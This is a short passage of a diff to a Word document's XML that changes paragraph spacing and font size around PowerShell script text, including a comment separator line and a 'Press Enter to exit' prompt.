-        <w:t>#--------------------------------------------------------------------------------------------------------------------------------------------------------------</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
+        <w:spacing w:after="0"/>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
           <w:lang w:val="en-US"/>
         </w:rPr>
         <w:t>Read-Host -Prompt "Press Enter to exit"</w:t>
